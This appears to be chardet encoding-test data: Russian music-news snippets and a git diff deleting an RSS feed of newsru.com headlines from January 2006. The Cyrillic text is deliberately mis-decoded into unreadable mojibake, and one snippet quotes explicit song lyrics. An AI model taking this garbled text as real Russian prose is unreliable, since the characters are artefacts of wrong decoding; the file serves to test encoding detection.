ףכ¨ף¦װײ¬ײ דו וחד , · דו כ דכײ¨¬ײ בײ¦  ף ֶײװײ¦ ו¨׀ׂ· י װב , NOFX ב¨ץ·׀· ״ײ׀װײדום ״ײ¬בחף·וםד כ ¦חב ֶײכ ׀װ·¨ · ד ׂײ״ בײ¦·בײכ װ·¨. ׁ·ב·ֶ  ו·״ : «She's got a silicone cock sticking in her ass  one in her cunt» ·׀· «there's nothing finer than having a vagina» כב¦׀· ״ב·¦¨וד ״ײ כֶחדח חוײװ¨װװסׂ ·װו¨׀׀¨ֶוח ׀ ׂ, װײ ¨¬ײ כס µײו¨׀·, קוײ י¨ כד¨-ו ֶ· ״ װֶ-בײֶ. - - - - No Use For A Name "More Betterness" CD - http://music.peeps.ru/news/s/2003/02/11/1198.html - בײ¬ב¨דד·בח ד ֶ י¦סׂ װײכסׂ  ׀ם¢ײׂײׂ NUFN ״ײµײי¨ ¦ײדו·¬׀· דײכ¨בץ¨װדוכ . ל ײו׀··¨ ײו ¢ײ׀םץ·װדוכ  ײ¦װײײ¢ב ףװײ כ¨ד¨׀סµ ״ײ״-״ װֶ ¬בח״״, NUFN ֶ׀ ¦חו כ ײדװײכס דכײ¨½ ׂחףסֶ· ¬בחדוװס¨ ׂ¨׀ײ¦··, ֶײוײבס¨ כ דײ¨ו װ·· ״בײװ·ֶװײכ¨װװסׂ כײֶ ׀ײׂ · ׂ¬ֶ·ׂ ¬·ו בװסׂ ףכחֶײׂ ״בײ·ףכײ¦ו װ¨·ף¬׀ ¦·ׂײ¨ כ״¨ ו׀¨װ·¨. - - - - Good Riddance "Operation phoenix" CD - http://music.peeps.ru/news/s/2003/02/11/1197.html - ט¦ װײ דײ¨ו  ו·״·װײ ֶ ׀·×ײבװ·½דֶח ״ װֶײכדֶח ׂ¨׀ײ¦·װײדום ד ח״בח¬·ׂ µ ב¦ֶײבײכסׂ ףכח װ·¨ׂ (כ ׂחףסֶ¨) · דײ₪· ׀םװײ-״ײ׀·ו·¨דֶח ו¨ׂ ו·ֶח ד ׀·װסׂ· ״¨ב¨י·כ װ·ׂ· (כ ו¨ֶדו µ), GR װ¨ כ ״¨בכס½ ב ף ¦ײֶ ףסכ ו, וײ כ׀וד ײ¦װײ½ ·ף ד ׂסµ ד·׀םװסµ · װ¨ף חב¦װסµ ״ װֶ-¬בח״״ 90-µ. - - - - diff --git a/chardet/tests/IBM855/newsru.com.xml b/chardet/tests/IBM855/newsru.com.xml deleted file mode 100644 index c91edaa..0000000 --- a/chardet/tests/IBM855/newsru.com.xml +++ /dev/null @@ -1,351 +0,0 @@ - - - - -NEWSru.com -http://www.newsru.com -ױײכײדו· -ru -NEWSru.com, all rights reserved -info@newsru.com -Wed, 4 Jan 2006 05:45:00 +0300 - - http://newsru.com/img/ntv.gif - NEWSru.com - http://www.newsru.com - 115 - 28 - - - - ל זחב₪·· ״ד·µ·¨דֶ· װ¨ף¦ײבײכס½ ׂחי·װ  כףײבכ ׀ µ׀ײ״חץֶח כ ף¦ װ·· ׃·װדו  - http://www.newsru.com/world/03jan2006/ankara.html - ¸װ₪·¦¨װו ״בײ·ףײץ¨׀ װ  ײ¦װײׂ ·ף קו י¨½ ף¦ װ· ׃·װדו  כ ¡װֶ ב¨, ¬¦¨ ב ד״ײ׀ײי¨װײ ח״ב כ׀¨װ·¨ ·ד״ײ׀װ¨װ· װ ֶ ף װ·½. ל ״ײ׀·₪·· חכ¨בו, וײ ״בײ·דץ¨¦ץ¨¨ װ¨ כ׀¨וד ו¨ב ֶוײׂ. ל·װײכװ·ֶ ״בײ·דץ¨דוכ· ף ¦¨בי װ. - ל ׂ·ב¨ - Tue, 3 Jan 2006 19:57:00 +0300 - - - - - ל ­¸£§§ ײ¢¨ש ו װ¨ ץוב ×ײכ ום כ װכ ב¨ כײ¦·ו¨׀¨½ ף  װ בחץ¨װ· װײכסµ ״ב כ·׀ ¦ײבײיװײ¬ײ ¦כ·י¨װ· - http://www.newsru.com/russia/03jan2006/gibddnow.html - ל ״¨בכס¨ װ¨¦¨׀· װײכײ¬ײ ¬ײ¦  דײובח¦װ·ֶ· ­¸£§§ ¢ח¦חו ׀ײ׀םװײ ײוװײד·וםד ֶ כײ¦·ו¨׀ׂ, װ¨ חד״¨כץ·ׂ כסח·ום װײכס¨ ״ב כ·׀  ¦ײבײיװײ¬ײ ¦כ·י¨װ·, כדוח״·כץ·¨ כ ד·׀ח ד 1 װכ ב 2006 ¬ײ¦ . ¸װד״¨ֶוײב ׂ ­¸£§§ ״ב¨¦״·ד װײ ײ¢דװ·ום כײ¦·ו¨׀ דחום װ בחץ¨װ· · ד¦¨׀ ום ¨ׂח ״ב¨¦ח״ב¨י¦¨װ·¨. - ל גײדד·· - Tue, 3 Jan 2006 19:22:00 +0300 - - - - - ל ¸ב ֶ¨ ב ף¢·׀ד  ׂ¨ב·ֶ װדֶ·½ כײ¨װװס½ כ¨בוײ׀¨ו: ¦כײ¨ ״ײ¬·¢ץ·µ - http://www.newsru.com/world/03jan2006/heli.html - ײ ¦ װװסׂ ·ב ֶדֶײ½ ״ײ׀·₪··, כ¨בוײ׀¨ו ח״ ׀ ·׀· ¢ס׀ ד¢·ו כײ כוײבװ·ֶ ״ב·ׂ¨בװײ כ 60 ֶ·׀ײׂ¨וב µ ד¨כ¨בײ-כײדוײװ¨¨ £ ¬¦ ¦ . ל ב¨ףח׀םו ו¨ ·װ₪·¦¨װו  ״ײ¬·¢׀· ¦כײ¨ כײ¨װװײד׀חי ש·µ  בׂ·· הצ¡. - ל ׂ·ב¨ - Tue, 3 Jan 2006 18:58:00 +0300 - - - - - גײדד·½דֶ·¨ ו¨װװ·ד·דוס װ¨ח¦ װײ דו בוײכ ׀· װ  ַח¢ֶ¨ ¶ײ״ׂ װ  - http://www.newsru.com/sport/03jan2006/hopman.html - ה¢ײבװ  גײדד·· ״ײ ו¨װװ·דח ״בײ·¬ב ׀  דכײ½ דו בוײכס½ ׂ ו װ  וב ¦·₪·ײװװײׂ װײכײ¬ײ¦װ¨ׂ וחבװ·ב¨ ַח¢ײֶ ¶ײ״ׂ װ  ד ״ב·ףײכסׂ ×ײװ¦ײׂ ׂ·׀׀·ײװ ¦ײ׀׀ בײכ הצ¡, ֶײוײבס½ ״בײµײ¦·ו כ  כדוב ׀·½דֶײׂ ¬ײבײ¦¨ ¨בו. - ה״ײבו - Tue, 3 Jan 2006 18:32:00 +0300 - - - - - - - £ײ¬ וס¨ בײדד·װֶ· ¦¨׀ ו ײ¢ײבײו · ײ״ב¨¦¨׀ו דו·׀ם ¨כבײ״¨½דֶ·µ ¦ײׂײכ ׂײ¦ס - http://www.newsru.com/russia/03jan2006/women.html - ַב¨דוםװדֶ·¨ ¢׀חףס, ׂװײ¬ײ ׂ¨µײכ · ¢בײדֶ·¨ חֶב ץ¨װ· - כ װסװ¨ץװ¨ׂ ד¨ףײװ¨ ¢ײ¬ וס¨ בײדד·װֶ· ¦¨׀ ו ײ¢ײבײו · ײ״ב¨¦¨׀ו דו·׀ם ף ״ ¦װסµ ¦ײׂײכ ׂײ¦ס. גחדדֶ·¨ ד ח¦ײכײ׀םדוכ·¨ׂ כסדו כ׀ו דכײ¨ ¢ײ¬ ודוכײ װ ״ײֶ ף, ״·ץ¨ו S&#252;ddeutsche Zeitung. - ל גײדד·· - Tue, 3 Jan 2006 17:53:00 +0300 - - - - - לײ «ב װ₪·· ד 4 װכ ב ײוׂ¨װ¨וד ב¨ףכס ½װײ¨ ״ײ׀ײי¨װ·¨, ככ¨¦¨װװײ¨ כ דכף· ד ׂ דדײכסׂ· ¢¨ד״ײב¦ֶ ׂ· - http://www.newsru.com/world/03jan2006/nochs.html - ב¨ףכס ½װײ¨ ״ײ׀ײי¨װ·¨ ¢ס׀ײ ככ¨¦¨װײ כײ «ב װ₪·· 8 װײ¢ב 2005 ¬ײ¦  חֶ ףײׂ ״ב¨ף·¦¨װו  דוב װס כ דכף· ד ׂ דדײכסׂ· ¢¨ד״ײב¦ֶ ׂ· כ ״ב·¬ײבײ¦ µ  ב·י ,   21 װײ¢ב ״ ב׀ ׂ¨װו ״בײ¦׀·׀ ¨¬ײ ¦¨½דוכ·¨ װ  וב· ׂ¨ד₪ . - ל ׂ·ב¨ - Tue, 3 Jan 2006 17:09:00 +0300 - - - - - ל ¸ב ֶ¨ ללה הצ¡ ײ¢דוב¨׀׀· י·׀ײ½ ¦ײׂ: ״ײ¬·¢׀  ד¨ׂם ·ף 14 ¨׀ײכ¨ֶ - http://www.newsru.com/world/03jan2006/iraq.html - ײ ד׀ײכ ׂ ״ב¨¦דו כ·ו¨׀ ·ב ֶדֶ·µ ״ב כײײµב װ·ו¨׀םװסµ ײב¬ װײכ, ײ¢דוב¨׀ח ד כײף¦חµ  ״ײ¦כ¨ב¬ד י·׀ײ½ ¦ײׂ כ ¬ײבײ¦¨ £ ½¦י· װ  ד¨כ¨ב¨ ¸ב ֶ . ה¨ׂם ·ף 14 ¨׀ײכ¨ֶ, װ µײ¦·כץ ד כ ¦ײׂ¨, ״ײ¬·¢׀ . ל ב¨ףח׀םו ו¨ ײ¢דוב¨׀  ¨ש¨ וב· ¨׀ײכ¨ֶ  ״ײדוב ¦ ׀·, װ¨דֶײ׀םֶ·ׂ ¦ײׂ ׂ װ װ¨ד¨װ חש¨ב¢. - ל ׂ·ב¨ - Tue, 3 Jan 2006 16:38:00 +0300 - - - - - ל ׃·װדֶ¨ ״ײ ״ײ¦ײףב¨װ· כ × ׀םץ·כײׂײװ¨וװ·¨דוכ¨ ף ¦¨בי װ דסװ ח¢·וײ½ יחבװ ׀·דוֶ· ¨בֶ דײכײ½ - http://www.newsru.com/crime/03jan2006/minsk.html - ל ײוװײץ¨װ·· דסװ  ח¢·וײ½ כ ֶײװ₪¨ 2004 ¬ײ¦  יחבװ ׀·דוֶ· ל¨בײװ·ֶ· ¨בֶ דײכײ½ ¡װוײװ  «·׀·ׂײװײכ  · ¨ש¨ װ¨דֶײ׀םֶ·µ ¨¬ײ ףװ ֶײׂסµ כײף¢חי¦¨װײ ח¬ײ׀ײכװײ¨ ¦¨׀ײ ״ײ דו. 221 "¸ף¬ײוײכ׀¨װ·¨, µב װ¨װ·¨ ׀·¢ײ ד¢סו × ׀םץ·כסµ ¦¨װ¨¬ ·׀· ₪¨װװסµ ¢חׂ ¬". - ַב·ׂ·װ ׀ - Tue, 3 Jan 2006 15:39:00 +0300 - - - - - ױ¨×וװס¨ ₪¨װס כסבײד׀· ·ף-ף  ¬ ףײכײ¬ײ ֶײװ×׀·ֶו  - http://www.newsru.com/finance/03jan2006/oil.html - ¥¨װס װ  װ¨×ום װ  ײדװײכװסµ ׂ·בײכסµ ¢·בי µ כסבײד׀· ·ף-ף  ײף ¢ײ¨װװײדו· וב¨½¦¨בײכ בײדד·½דֶײ-חֶב ·װדֶ·ׂ ¬ ףײכסׂ ֶײװ×׀·ֶוײׂ. ױ  ױם-¾ײבֶדֶײ½ NYMEX ¢ בב¨׀ם ״ײ¦ײבײי ׀ װ  2,16 ¦ײ׀׀ ב  - ¦ײ 63,2 ¦ײ׀׀ ב  ף  ¢ בב¨׀ם. - רֶײװײׂ·ֶ  - Tue, 3 Jan 2006 15:28:00 +0300 - - - - - - - ל ¨׀¢·װדֶ¨ ׂ¨דוװס½ י·ו¨׀ם וב¨¢ח¨ו ײו דח¦  ב ףײ¢ב וםד, ײו ֶײ¬ײ ײװ ״בײ·ףײץ¨׀: ײו ¡¦ ׂס · ©כס ·׀· ײו ײ¢¨ףםװס - http://www.newsru.com/russia/03jan2006/sered.html - ך·ו¨׀ם ¨׀¢·װדֶ  ל ד·׀·½ ה¨ב¨¦ײװ·װ, כסדוח״ ש·½ ײוכ¨ו·ֶײׂ כ ײ¦װײׂ ·ף דח¦¨¢װסµ ״בײ₪¨דדײכ, µײ¦ ו ½דוכײכ ׀ ײ¢ ײוכײ¦¨ דח¦ם·, ׂײו·כ·בח קוײ ו¨ׂ, וײ ײ¢  ײװ· ״בײ·ףײץ׀· ײו ¡¦ ׂ  · ©כס, וײ ¨דום כ׀וד בײ¦דוכ¨װװ·ֶ ׂ·. ׳װ ד·ו ¨ו, וײ דח¦ ¦ײ׀י¨װ ״בײדװ·ום קוײו כײ״בײד. - ל גײדד·· - Tue, 3 Jan 2006 15:15:00 +0300 - - - - - ­בחף·װ ד װײיײׂ  ו ֶײכ ׀ 20-ׂ¨ובײכח װ ¦חכװח דײ¢ ֶח װ  ¬׀ כװײ½ ״׀ײש ¦· פח¬¦·¦· («׳ז׳) - http://www.newsru.com/world/03jan2006/knifer.html - ז¨ׂחב ַײ¢ ׀· װ¨דֶײ׀םֶײ ב ף ״בײוֶװח׀ דײ¢ ֶח װײיײׂ, ״ײד׀¨ ¨¬ײ ¢ס׀ ף ¦¨בי װ ״ײ׀·₪·¨½. ׳װ װ¨ דׂײ¬ ¦ ום כװוװײ¬ײ ײ¢דװ¨װ· דכײ¨ׂח ״ײדוח״ֶח. ©ׂח ¬בײף·ו וב· ¬ײ¦  ובםׂס. - ל ׂ·ב¨ - Tue, 3 Jan 2006 14:52:00 +0300 - - - - - - - - - ל ַ ·ב¨ ײ¢בחץ·׀·דם װ¨דֶײ׀םֶײ י·׀סµ ¦ײׂײכ: ״ײ¬·¢׀· 3 ¨׀ײכ¨ֶ , 4 ״ײ׀ח·׀· ב װ¨װ· - http://www.newsru.com/world/03jan2006/cairo.html - ¸ף-ף  ײ¢בחץ¨װ· ץ¨דו·- · וב¨µקו יװײ¬ײ י·׀סµ ¦ײׂײכ כ דוײ׀·₪¨ ©¬·״ו  ף כ ׀ ׂ· ײֶ ף ׀ד ״¨ב¨ֶבסו ״ײ¦¨ף¦ ¦׀ ו¨µװ·ֶ·. ב··װײ½ ײ¢בחץ¨װ· ¦ײׂײכ דו ׀ײ וײ, וײ ׂ¨דוװס¨ י·ו¨׀· דובײו ·µ ·ף ד ׂײ¦¨׀םװײ¬ײ ֶ·ב״· , ·ף¬ײוײכ׀¨װװײ¬ײ ·ף ״ב¨דדײכ װװײ¬ײ ׂחדײב . - ל ׂ·ב¨ - Tue, 3 Jan 2006 14:37:00 +0300 - - - - - גײדד·װ¨ װ ףכ ׀· ד ׂס¨ ·װו¨ב¨דװס¨ ×·׀םׂס, ֶװ·¬·, יחבװ ׀ס · ו¨׀¨״¨ב¨¦ · כ 2005 ¬ײ¦ח - http://www.newsru.com/cinema/03jan2006/best.html - ט דוװ·ֶ· ײ״בײד , ״בײכ¨¦¨װװײ¬ײ ¡װ ׀·ו·¨דֶ·ׂ ₪¨װובײׂ ב· ׁ¨כ ¦ס, ״ײ״סו ׀·דם װ ףכ ום ד ׂס½ ·װו¨ב¨דװס½ ×·׀םׂ, ֶװ·¬ח, ו¨׀¨״בײ¬ב ׂׂח · יחבװ ׀. ב·ׂ¨ ו¨׀םװײ, וײ ײדװײכװײ½ ײוכ¨ו װ  כד¨ 4 כײ״בײד  - "ף ובח¦װדם ײוכ¨ו·ום". - ַח׀םוחב  - Tue, 3 Jan 2006 14:22:00 +0300 - - - - - - - ל װײכײׂ ¬ײ¦ח װ  ׃ַה ׂײ¬חו ײוׂ¨װ·ום "דחµײ½ ף ֶײװ" - http://www.newsru.com/russia/03jan2006/mks.html - -טי¨ ״ום ׀¨ו ד ׂײׂ¨װו , ֶײ¬¦  ׃ַה דו ׀  ײ¢·ו ¨ׂײ½, װ  װ¨½ ¦¨½דוכח¨ו י¨דוײ ½ץ·½ ף ״ב¨ו װ   ׀ֶײ¬ײ׀ם. ײ ד׀חµ ׂ, ״¨בכסׂ ״ײד׀ ¢׀¨װ·¨ׂ דו ׀  ¦ײדו כֶ  װ  ¢ײבו ץײֶײ׀ ¦װסµ ֶײװרו ד ׀·ֶ¨בײׂ. ױײ ¦ י¨ קוײ ײ×·₪· ׀םװײ ״ײ¦וכ¨ב¦·ום װ¨כײףׂײיװײ, כ¨¦ם װ בחץ·ו¨׀ׂ ¬בײף·ו װ¨ׂ¨¦׀¨װװײ¨ חכײ׀םװ¨װ·¨. - ל גײדד·· - Tue, 3 Jan 2006 13:48:00 +0300 - - - - - - - Maariv: טד ׂ  ¢¨װ ׁ ¦¨װ חי¨ 3 ¬ײ¦  י·כ¨ו כ ¸ףב ·׀¨ - http://www.newsru.com/world/03jan2006/laden.html - -­ב י¦ װ·װ ¡×¬ װ·דו װ  טד ׂ  ¢¨װ ׁ ¦¨װ כ¨µ ׀ כ ¸ףב ·׀ם ״ײ וחב·דו·¨דֶײ½ כ·ף¨ ¨ב¨ף ¬ײ¦ · וב· ¦װ ״ײד׀¨ ו¨ב ֶוײכ 11 ד¨װו¢ב 2001 ¬ײ¦  כ הצ¡, ״¨ב¨¦  ׂ¨ב·ֶ װדֶ·ׂ כוײבי¨װ·¨ׂ כ ¸ב ֶ. ©¬ײ כס¨ף¦ ·ף ¸ףב ·׀ װ¨ ¢ס׀ ף ×·ֶד·בײכ װ. - ל ׂ·ב¨ - Tue, 3 Jan 2006 13:32:00 +0300 - - - - - גײדד·װ¨ װ ףכ ׀· ד ׂסµ חׂװסµ, דׂ¨׀סµ · ד¨ֶדח ׀םװסµ ״ײ׀·ו·ֶײכ דוב װס - http://www.newsru.com/russia/03jan2006/politics.html - ¡װ ׀·ו·¨דֶ·½ ₪¨װוב ב· ׁ¨כ ¦ס ״בײכ¨׀ ײ״בײד דב¨¦· בײדד·װ כ ֶײװ₪¨ 2005 ¬ײ¦ . ג¨ד״ײװ¦¨װוס ײוכ¨ו·׀· װ  כײ״בײדס ײ ד ׂסµ ¨דוװסµ, דׂ¨׀סµ, חׂװסµ · ד¨ֶדח ׀םװסµ ״ײ׀·ו·ֶ µ. ¸ׂ· דו ׀· חו·װ · ך·ב·װײכדֶ·½. ַבײׂ¨ וײ¬ײ, בײדד·װ¨ װ ףכ ׀· גײׂ װ  ¡¢ב ׂײכ·  ד ׂסׂ ¢ײ¬ וסׂ ¨׀ײכ¨ֶײׂ דוב װס. - ל גײדד·· - Tue, 3 Jan 2006 13:05:00 +0300 - - - - - - - - ל Windows װ ½¦¨װ  ײ״ דװ  חףכ·ׂײדום, ח¬בײי ש  ״ײו· כד¨ׂ ֶײׂ״םו¨ב ׂ װ  ״׀ װ¨ו¨ - http://www.newsru.com/world/03jan2006/windows.html - ׁ¢ײ½ ·ף ׂ·׀׀·ײװײכ ֶײׂ״םו¨בײכ ״ײ¦ ח״ב כ׀¨װ·¨ׂ ׳ה Windows ׂײי¨ו ¢סום  ו ֶײכ װ ״בׂײ ד¨½ ד, ״·ץ¨ו ¬ ף¨ו  Financial Times. ¡ו ֶ  ״בײ·דµײ¦·ו ״חו¨ׂ כװ¨ד¨װ· כב¨¦ײװײדװײ¬ײ ֶײ¦  כ ײ¢סװח ֶ בו·װֶח. רוײ ׂװײ¬ײֶב וװײ חכ¨׀··כ ¨ו ײ״ דװײדום ף ב י¨װ·. ַבײׂ¨ וײ¬ײ, Microsoft ״ײֶ  װ¨ כס״חדו·׀  ·ד״ב כ׀¨װ·¨, ף ֶבסכ ש¨¨ "¦סבח". - ל ׂ·ב¨ - Tue, 3 Jan 2006 12:25:00 +0300 - - - - - - - Die Presse: חו·װ - כ׀ דו¨׀·װ ¬ײ׀ח¢ײ¬ײ ײ¬װ - http://www.newsru.com/russia/03jan2006/putingas.html - "­ ף״בײׂ" &#8211; קוײ ¬׀ כװײ¨ ײבחי·¨ חו·װ  כ ¢ײבם¢¨ ף  כ׀·װ·¨ · כ׀ דום. ה ו¨µ ״ײב ֶ ֶ "­ ף״בײׂ" ״ב·ײדו װײכ·׀ דװ ¢י¨װ·¨ טֶב ·װס ״ב·בײ¦װסׂ ¬ ףײׂ, י·ףװם כ ₪¨װוב ׀םװײ½ ¦·ד״¨ו¨בדֶײ½ ׂײװײ״ײ׀··, װ¨דׂײוב װ  װײכײ¬ײ¦װ·¨ ״ב ף¦װ·ֶ·, ¢ם¨ו ֶ׀ײׂ. - ל גײדד·· - Tue, 3 Jan 2006 12:13:00 +0300 - - - - - - - ¸ף ״חװֶו  ײ¢ׂ¨װ  כ ׀וס כ ׃ײדֶכ¨ ״ײµ·ש¨װײ 35 וסד ¦ײ׀׀ בײכ - http://www.newsru.com/crime/03jan2006/grab.html - §כײ¨ װ¨·ףכ¨דוװסµ כ¨¨בײׂ כ ״ײװ¨¦¨׀םװ·ֶ דײכ¨בץ·׀· ב ף¢ײ½װײ¨ װ ״ ¦¨װ·¨ װ  ״חװֶו ײ¢ׂ¨װ  כ ׀וס װ  £ײבײכדֶײׂ ץײדד¨. ַ דד·ב  ח¦ ב·׀· ״ײ ¬ײ׀ײכ¨ · דכף ׀·. - ַב·ׂ·װ ׀ - Tue, 3 Jan 2006 12:03:00 +0300 - - - - - ל הצ¡ ֶײו ד״ ד י·ףװם µײף·װח, ״ײףכײװ·כ ״ײ ו¨׀¨×ײװח כ ד׀חי¢ח 911 - http://www.newsru.com/world/03jan2006/cat.html - 50 ׀¨וװ·½ ­ בב· גײץ¨½ףײװ ח״ ׀ ד ·װכ ׀·¦װײ¬ײ ֶב¨ד׀  · װ¨ ׂײ¬ ״ײ¦װוםד ·ף-ף  ד׀ח·כץ¨¬ײד ׂ·ֶבײ·װדח׀םו . ¶ײף·װ י·כײוװײ¬ײ ״ב·ףװ ׀ד, וײ ד״¨₪· ׀םװײ ״סו ׀ד ײ¢ח·ום ֶײו  װ י·ׂ ום װ  ו¨׀¨×ײװ¨ ֶװײ״ֶח ״בׂײ¬ײ ףכײװֶ  כ ד׀חי¢ח 911, װײ װ·ֶ ֶ װ¨ ב דד·וסכ ׀, וײ ֶײו ¦¨½דוכ·ו¨׀םװײ דׂײי¨ו קוײ ד¦¨׀ ום. - ל ׂ·ב¨ - Tue, 3 Jan 2006 11:42:00 +0300 - - - - - - - - - ױ¨ׂ¨₪ֶ  ״ ב  ף ׂחבײכ ׀  כ ¢¨וײװ ¦כחµ ¦¨ו¨½ - http://www.newsru.com/crime/03jan2006/germanz.html - ה ״ב·ףװ װ·¨ׂ כ ״ב כײײµב װ·ו¨׀םװס¨ ײב¬ װס כ·׀ד ׂחי·װ . ׳װ דײײ¢ש·׀, וײ כ ד¨ב¨¦·װ¨ 1990-µ ¬ײ¦ײכ ײװ ף µײבײװ·׀ ¦כחµ ¦¨ו¨½ כ ״ײ¦כ ׀¨ ¦ײׂ . ז¨׀  ¦¨ו¨½ ¢ס׀· ד״בו װס כ ׂחדײבװס½ ״ ֶ¨ו · ף ׂחבײכ װס. - ַב·ׂ·װ ׀ - Tue, 3 Jan 2006 11:24:00 +0300 - - - - - ׃¸§ ײ¢כ·װ¨ו ז¢·׀·ד· כ ב דֶבח·כ װ··  װו·בײדד·½דֶײ½ ֶ ׂ״ װ·· - http://www.newsru.com/russia/03jan2006/gruz.html - ז¢·׀·ד· ב דֶבח·כ ¨ו  װו·בײדד·½דֶח ֶ ׂ״ װ·. ­ײכײב·ום ײ דבײֶ µ ״ײ¦״·ד װ· בײדד·½דֶײ-¬בחף·װדֶײ¬ײ §ײ¬ײכײב  ײ ¦בחי¢¨ ׂײיװײ וײ׀םֶײ ״ײד׀¨ װײבׂ ׀·ף ₪··  וׂײדרבס כ ¦כחדוײבײװװ·µ ײוװײץ¨װ·µ, װ דו ·כ ¨ו ׃¸§. - ל גײדד·· - Tue, 3 Jan 2006 11:04:00 +0300 - - - - - - - ג דו¨ו ·ד׀ײ ״ײ¬·¢ץ·µ כ ב¨ףח׀םו ו¨ ײ¢כ ׀  ֶבסץ· ֶ וֶ  כ £ כ ב·· - http://www.newsru.com/world/03jan2006/de.html - ײ ׂ¨ב¨ ״בײ¦ײ׀י¨װ· ד״ ד ו¨׀םװסµ ב ¢ײו װ  ׂ¨דו¨ ײ¢בחץ¨װ· ֶבסץ· ד״ײבוֶײׂ״׀¨ֶד  כ ׂ¨דו¨ֶ¨ £ ¦ ג ½µ¨װµ ׀ם ד״ ד ו¨׀· ·ףכ׀¨ֶ ו ·ף-״ײ¦ ף כ ׀ײכ כד¨ װײכס¨ ו¨׀ . ײ ״ײד׀¨¦װ·ׂ ¦ װװסׂ, ·ד׀ײ ״ײ¬·¢ץ·µ ¦ײדו·¬׀ײ 15 ¨׀ײכ¨ֶ. £ײ׀¨¨ 30 ¨׀ײכ¨ֶ ״ײ׀ח·׀· ב װ¨װ·. ¨וכ¨בײ ד·ו וד ״בײ״ כץ·ׂ· ¢¨ף כ¨דו·. - ל ׂ·ב¨ - Tue, 3 Jan 2006 10:52:00 +0300 - - - - - - - - - - - - - - - - - - - - §כײ¨ כײ¨װװײד׀חי ש·µ ״ײ¬·¢׀· װ  ַ כ ¨װ¨ - http://www.newsru.com/russia/03jan2006/chechen.html - ײ¦כ¨ב¬ד ײ¢דוב¨׀ח ַ װ  ײֶב ·װ¨ ב ½₪¨װוב  ַחב ׀ײ½. ױ¨·ףכ¨דוװס¨ ׀·₪  ·ף  כוײׂ ו·¨דֶײ¬ײ ײבחי· ײ¢דוב¨׀׀· װ ב¦ כײ¨װװײד׀חי ש·µ לװחוב¨װװ·µ כײ½דֶ, ײדחש¨דוכ׀כץ·½ ¦ײדׂײוב  כוײוב װד״ײבו . - ל גײדד·· - Tue, 3 Jan 2006 10:34:00 +0300 - - - - - לףבסכ װ  ץ µו¨ כ הצ¡: 13 ¬ײבװֶײכ ״בײ״ ׀· ¢¨ף כ¨דו· - http://www.newsru.com/world/03jan2006/mine.html - לףבסכ ״בײ·ףײץ¨׀ װ  ח¬ײ׀םװײ½ ץ µו¨ כ פ ״ ¦װײ½ ל·ב¦י·װ··. ה״ ד ו¨׀ׂ ״ײֶ  װ¨ ח¦ ¨וד חדו װײכ·ום ֶײװו ֶו ד ¬ײבװֶ ׂ·, ֶײוײבס¨ ״ב¨¦״ײ׀ײי·ו¨׀םװײ ¢׀ײֶ·בײכ װס װ  ¬׀ח¢·װ¨ כ 80 ׂ¨ובײכ. - ל ׂ·ב¨ - Tue, 3 Jan 2006 10:21:00 +0300 - - - - - - - - "­ ף״בײׂ": טֶב ·װ  ״בײ¦ײ׀י ¨ו כײבײכ ום, װײ ״ײדו כֶ ׂ קוײ װ¨ ״ײׂ¨ץ ¨ו - http://www.newsru.com/finance/03jan2006/gas.html - ב¨ף·¦¨װו טֶב ·װס ש¨װֶײ חוכ¨בי¦ ¨ו, וײ ¬ ףײוב װד״ײבוװ  ד·דו¨ׂ  דוב װס ײ¢¨ד״¨·כ ¨ו וב װף·ו. "­ ף״בײׂ" ײ¢¨ש ¨ו ¨כבײ״¨½דֶ·ׂ ״ײוב¨¢·ו¨׀ׂ ֶײׂ״¨װד ₪··, חוכ¨בי¦ , וײ טֶב ·װ  ״בײ¦ײ׀י ¨ו װ¨ד װֶ₪·ײװ·בײכ װװײ ײו¢·ב ום בײדד·½דֶ·½ ¬ ף. - רֶײװײׂ·ֶ  - Tue, 3 Jan 2006 10:11:00 +0300 - - - - - - - - - ה״¨₪ײ״¨ב ₪· כ § ¬¨דו װ¨: ח¢·וס 5 ¢ײ¨כ·ֶײכ · 2 ׂ·׀·₪·ײװ¨ב  - http://www.newsru.com/russia/03jan2006/oper.html - ל µײ¦¨ ׂ דץו ¢װײ½ ד״¨₪ײ״¨ב ₪·· ״ײ ¢׀ײֶ·בײכ װ· ¬בח״״ס ¢ײ¨כ·ֶײכ כ טװ₪חֶח׀םדֶײׂ ב ½ײװ¨ § ¬¨דו װ  ב װ¨װ· ״ײ׀ח·׀· 7 דײובח¦װ·ֶײכ ״ב כײײµב װ·ו¨׀םװסµ ײב¬ װײכ, ¦כײ¨ ·ף װ·µ דֶײװ ׀·דם. ײו¨ב· ¢ײ¨כ·ֶײכ ײ₪¨װ·כ וד כ ״ום ח¢·וסµ. ¡ֶו·כװ  × ף  ד״¨₪ײ״¨ב ₪·· ד װ דוח״׀¨װ·¨ׂ ו¨ׂװײוס ״ב·ײדו װײכ׀¨װ . - ל גײדד·· - Tue, 3 Jan 2006 09:48:00 +0300 - - - - - - - - ַ 2050 ¬ײ¦ח כ ׂ·ב¨ ״ײכוד װײכס¨ דכ¨בµ¦¨בי כס. גײדד· ״בײ¦ײ׀י·ו ״ײדו¨״¨װװײ כסׂ·ב ום - http://www.newsru.com/world/03jan2006/future.html - ַ·ו ½ ֶ 2050 ¬ײ¦ח דו װ¨ו ד ׂײ½ ׂײשװײ½ קֶײװײׂ·¨דֶײ½ ¦¨בי כײ½ ״׀ װ¨וס, ¸װ¦· - ׂ·בײכסׂ ׀·¦¨בײׂ ״ײ ·ד׀¨װװײדו· װ ד¨׀¨װ·, וײ¬¦  ֶ ֶ גײדד· ד חׂ¨װםץ·כץ·ׂד װ ד¨׀¨װ·¨ׂ כײ½¦¨ו כ ¦¨דוֶח ״ײ ׂײש· קֶײװײׂ·ֶ·. - ל ׂ·ב¨ - Tue, 3 Jan 2006 09:42:00 +0300 - - - - - - - ױ כײ¦װ¨װ·¨ כ ¸װ¦ײװ¨ף··: ·ד׀ײ ״ײ¬·¢ץ·µ ״ב¨כסד·׀ײ 50 ¨׀ײכ¨ֶ - http://www.newsru.com/world/03jan2006/flood.html - ¸ף-ף  ״בײ¦ײ׀י כץ·µד ¦כ  ¦װ ״ײ¦ב¦ ¦ײי¦¨½ כ ב ½ײװ¨  װו· ״בײ·ףײץ¨׀ ¬·¬ װודֶ·½ ײ״ײ׀ף¨װם · כסץ׀  ·ף ¢¨ב¨¬ײכ ב¨ֶ , כ ב¨ףח׀םו ו¨ ¨¬ײ ׂײשװס¨ ״ײוײֶ· כײ¦ס · ¬בף· ײ¢בחץ·׀·דם װ  װ¨דֶײ׀םֶײ ¢׀·ף׀¨י ש·µ ¦¨ב¨כ¨װם. - ל ׂ·ב¨ - Tue, 3 Jan 2006 09:26:00 +0300 